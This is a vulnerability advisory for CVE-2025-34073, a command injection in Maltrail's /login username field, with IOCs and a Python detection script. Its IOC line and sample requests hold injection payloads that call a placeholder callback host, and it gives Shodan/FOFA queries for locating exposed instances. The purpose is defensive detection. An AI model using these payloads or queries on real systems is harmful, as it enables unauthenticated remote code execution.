CVE-2025-34073
published 2025-07-02


Priority: P1 · 81 · Severity: critical · CVSS 4.0 base score: 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Tag: EXPLOIT
EPSS: 3.88% (88.9th percentile)
An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. This occurs due to unsafe handling of user-supplied input passed to subprocess.check_output() in core/http.py, allowing injection of shell metacharacters. Exploitation does not require authentication and commands are executed with the privileges of the Maltrail process.

Affected (1 range)

Vendor: stamparm · Product: maltrail · Version range: <= 0.54 · Fixed in: (not listed)

Detection & IOCs (extracted from sources)

url: /login
path: core/http.py
path: mailtrail/core/httpd.py
command: username=;`curl http://{{interactsh-url}}`
  • Monitor POST requests to the /login endpoint for shell metacharacters (semicolons, backticks, pipes) in the username parameter; these indicate command injection attempts against Maltrail.
  • Use the Shodan query `http.title:"Maltrail"` or the FOFA query `app="Maltrail"` to identify exposed Maltrail instances that may be vulnerable to this unauthenticated RCE.
  • Detect exploitation by checking HTTP response headers for the string 'Maltrail' together with out-of-band callback activity (HTTP or DNS) originating from the server, which indicates successful command execution.
  • Exploitation does not require authentication; any unauthenticated POST to /login with a crafted username field should be treated as a high-severity alert on Maltrail versions <= 0.54.
  • Injected commands execute with the privileges of the Maltrail process, so impact depends on the OS-level permissions of that process at deployment time.
  • The vulnerability affects Maltrail versions <= 0.54; the Metasploit module was validated against versions 0.52 and 0.53, so detections should cover the full affected range.
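The first monitoring rule above, implemented over constructed sample requests, as an added example that is neither Maltrail code nor code from the cited sources. It keys on POST /login, percent-decodes the form body so an encoded `%3B` is seen as `;`, and reports which metacharacters appeared; the hostnames, client address and callback domain are placeholders chosen for the example.

```python
"""Flag POST /login requests whose form-encoded ``username`` carries shell
metacharacters (the CVE-2025-34073 probe pattern described above).

Constructed illustration: the parser and sample traffic below are not Maltrail
code and were not captured from a real system.
"""
import re
from typing import Optional
from urllib.parse import parse_qs

# Characters and sequences that let a value break out of a shell command line.
# Quote characters are deliberately not listed; add them if your logs show the
# value is interpolated inside a quoted shell string.
SHELL_META = re.compile(r"[;|&`\n\r]|\$\(|\$\{")


def parse_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def username_from_form(body: str) -> Optional[str]:
    """Return the first ``username`` field; parse_qs percent-decodes for us."""
    values = parse_qs(body, keep_blank_values=True).get("username")
    return values[0] if values else None


def inspect_request(raw: str) -> Optional[dict]:
    """Return a finding dict for a suspicious POST /login, else None."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path.split("?", 1)[0] != "/login":
        return None
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    username = username_from_form(body)
    if username is None:
        return None
    hits = sorted(set(SHELL_META.findall(username)))
    if not hits:
        return None
    return {
        "src": headers.get("x-forwarded-for", "unknown"),
        "username": username,
        "metacharacters": hits,
    }


def scan(requests) -> list:
    """Run inspect_request over many raw requests, keeping only findings."""
    return [f for f in (inspect_request(r) for r in requests) if f]


# Constructed sample traffic (placeholder hosts and addresses).
SAMPLE_REQUESTS = [
    # Ordinary login: no shell metacharacters in the username.
    "POST /login HTTP/1.1\r\nHost: maltrail.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=analyst&password=s3cret",
    # Probe shaped like the IOC above, percent-encoded as a browser would send it.
    "POST /login HTTP/1.1\r\nHost: maltrail.internal\r\nX-Forwarded-For: 203.0.113.7\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=%3B%60curl+http%3A%2F%2Fcallback.example%60&password=x",
    # Same string on a GET: out of scope for this rule, which keys on POST /login.
    "GET /login?username=%3Bid HTTP/1.1\r\nHost: maltrail.internal\r\n\r\n",
    # Metacharacters on another endpoint: not this vulnerability.
    "POST /ping HTTP/1.1\r\nHost: maltrail.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=a%7Cb",
    # Punctuation that is not a shell metacharacter must not fire.
    "POST /login HTTP/1.1\r\nHost: maltrail.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=o.neil%40example.com&password=pw",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Wire `inspect_request` to whatever feeds you reconstructed request bodies (a WAF log, a reverse-proxy body capture, or a PCAP carve); plain access logs usually lack POST bodies, so the rule needs a source that records them. Versions <= 0.54 reached via any of the flagged requests warrant the high-severity handling the fourth bullet calls for.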